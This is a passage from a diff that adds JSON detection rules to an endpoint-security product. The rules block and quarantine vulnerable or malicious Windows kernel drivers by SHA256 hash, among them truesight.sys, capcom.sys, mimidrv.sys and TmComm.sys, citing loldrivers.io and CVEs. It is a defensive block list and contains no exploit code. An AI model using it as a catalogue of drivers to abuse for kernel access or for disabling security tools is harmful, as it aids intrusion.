+ "comment": "Vulnerable Kernel Driver (aka AsrSetupDrv103.sys) [https://www.loldrivers.io/drivers/19003e00-d42d-4cbe-91f3-756451bdd7da/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7e6d5bbf-b262-5c05-b01d-4e8d240ce0c0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.459431Z",
+ "creation_date": "2026-03-23T11:45:30.459434Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.459443Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "81bcd8a3f8c17ac6dc4bad750ad3417914db10aa15485094eef0951a3f72bdbd",
+ "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7e791d8a-cd10-56b3-a2e4-7a29186d8c1d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.971633Z",
+ "creation_date": "2026-03-23T11:45:29.971635Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.971641Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dcf9bc1e511993fd8c87b8cab5c23366cc818cccc40617cabc8f242d4a8751d7",
+ "comment": "MalwareFox AntiMalware Vulnerable Driver (aka zam64.sys and zam32.sys) [CVE-2021-31727, CVE-2021-31728] [https://www.loldrivers.io/drivers/e5f12b82-8d07-474e-9587-8c7b3714d60c/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7e7d9b00-d6b0-5e3d-82f9-b0214ddc989b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.811993Z",
+ "creation_date": "2026-03-23T11:45:31.811995Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.812000Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3d404dd8e5a851912403e7d444819d4930435377b112fe4ca56368e46617cf14",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7e8c1a8b-1dee-5208-a8e4-282424b5c636",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.145151Z",
+ "creation_date": "2026-03-23T11:45:32.145153Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.145158Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5c308aede12fefb8145c015a97d7844106df5469de97773cba3bd3d772dc7d24",
+ "comment": "Malicious Kernel Driver (aka driver_5c308aed.sys) [https://www.loldrivers.io/drivers/647f72e7-f378-4908-946c-5e45fab448e8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7e999679-f7bd-5b0f-a43a-07bc485d162c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.462642Z",
+ "creation_date": "2026-03-23T11:45:30.462645Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.462654Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2d36642135166bbb296624dca878925963c7da785e42e940f02d01beb7c477d5",
+ "comment": "Vulnerable Kernel Driver (aka asio64.sys) [https://www.loldrivers.io/drivers/8b9d1a29-f5f4-4ce6-8fe2-5709123f7b86/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7ea04c9f-d96f-56f4-948c-c448d6b770e2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.968114Z",
+ "creation_date": "2026-03-23T11:45:29.968116Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.968121Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "002fb91a8ed384fa2bb8b72ee3a31c58f5fe73c7ebafc8255e598753b7613dd8",
+ "comment": "Projector Rootkit malicious drivers (aka KB_VRX_deviced.sys) [https://twitter.com/struppigel/status/1551503748601729025] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7eb2126d-c54d-5e8c-8e42-c6864bac51d4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.604205Z",
+ "creation_date": "2026-03-23T11:45:29.604207Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.604213Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1933f27ebebde55942291381219497019077548a074e8dcdb120c94df1a2489e",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7eb62d52-aaef-5331-90f6-13c6d3da1674",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.455920Z",
+ "creation_date": "2026-03-23T11:45:30.455924Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.455933Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3e62730949b6cbbaf938d9b2015fe1b84eb63322c4287d0ce2b4c6f987c2dadd",
+ "comment": "Vulnerable Kernel Driver (aka HWiNFO32.SYS) [https://www.loldrivers.io/drivers/2225128d-a23f-434a-aaee-69a88ea64fbd/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7ec10a45-fc42-5993-96d7-60c3a8b8fb6c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.499693Z",
+ "creation_date": "2026-03-23T11:45:31.499697Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.499705Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4820e2269e711eb8c8656691cefc36c344f36611ba50f6a1ca772c2c924260aa",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7ec3b3af-0036-5f0f-b22a-b25b4859bb03",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.827471Z",
+ "creation_date": "2026-03-23T11:45:30.827473Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.827479Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d06ad26e336360720834394c105e5ff6a982bffb2f1b17633de12a5accda462d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7ec446e8-687c-59e5-a07c-4f16bcae06a8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.824933Z",
+ "creation_date": "2026-03-23T11:45:31.824937Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.824946Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d2a3cafd51ef8ee390332285607bc138f0eb14794c6b3651b0c53fb56fe964ee",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7ed0dfb1-b1f0-567e-a0e5-7a0732f7f75f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.147570Z",
+ "creation_date": "2026-03-23T11:45:31.147572Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.147577Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0a768158c06ff8edfb78ec3b1e4fd94f6192db3a8e99de1bae49fe20b3b1b8cc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7ed3b7d1-aac0-5e42-a033-cd34edcedf95",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.974212Z",
+ "creation_date": "2026-03-23T11:45:29.974214Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.974219Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d580349730ace5170e7c33850bdcb37cbf16b70d0d1adc2568fdd223c2a55a77",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7ed9927e-4337-5ce4-be7d-2e66fa3dbe3d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.820353Z",
+ "creation_date": "2026-03-23T11:45:31.820356Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.820365Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3ca246561628f2a9af36c683656b7d35155019d0c852dd4d8ef0dab3b2e8fd8d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7edeec82-8157-58db-80e0-fbf233e75a5b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.464681Z",
+ "creation_date": "2026-03-23T11:45:30.464684Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.464693Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "26bea3b3ab2001d91202f289b7e41499d810474607db7a0893ceab74f5532f47",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7ef0d9b6-d7d4-55b2-a4ff-2665ab2f39ea",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.622105Z",
+ "creation_date": "2026-03-23T11:45:29.622107Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622112Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "db2a9247177e8cdd50fe9433d066b86ffd2a84301aa6b2eb60f361cfff077004",
+ "comment": "CapCom vulnerable driver (aka capcom.sys and smep_capcom.sys) [https://github.com/tandasat/ExploitCapcom] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7f062100-a1dc-5e01-8507-4857f7254c7e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.144726Z",
+ "creation_date": "2026-03-23T11:45:32.144728Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.144734Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d35bc51acafab893698e6064d286541918a789ac7c06a6442bf4351dde842777",
+ "comment": "Malicious Kernel Driver (aka windivert.sys) [https://www.loldrivers.io/drivers/45a31a17-f78d-48ec-beba-74f6bfc5f96e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7f164674-0e50-5379-91d5-367da8094c5f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146038Z",
+ "creation_date": "2026-03-23T11:45:31.146040Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146046Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "883cef0ccaa689226bd64f18797b991757985c0963f80924bc9fbe3f93c03ef6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7f21c238-96bc-5205-b518-93adc94f5e7b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.818666Z",
+ "creation_date": "2026-03-23T11:45:30.818668Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.818674Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "53e15b21cc69a554d4d61ffe531be90364ed7b1bb64fc302d65eaa642c9fa60a",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7f4390e7-622a-5d04-8c48-b90bedeeef4a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.497808Z",
+ "creation_date": "2026-03-23T11:45:31.497811Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.497819Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8b9b61e2e31eb8a8b9d5fc240489268fd4c77a70acbe000a79ec85445825a5ae",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7f440e0e-8cb2-5583-b1ef-8ff72f2be431",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.606025Z",
+ "creation_date": "2026-03-23T11:45:29.606027Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.606033Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "30abc0cc700fdebc74e62d574addc08f6227f9c7177d9eaa8cbc37d5c017c9bb",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7f494827-ebe7-5b84-9cf1-0179e8eb719c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.474263Z",
+ "creation_date": "2026-03-23T11:45:31.474267Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.474275Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9111e37a8b6b1ac41c4c909660301743cb1edf817555cce6c896a59ffe2025ec",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7f553e4d-ecb2-57aa-98df-5fd95309f1db",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
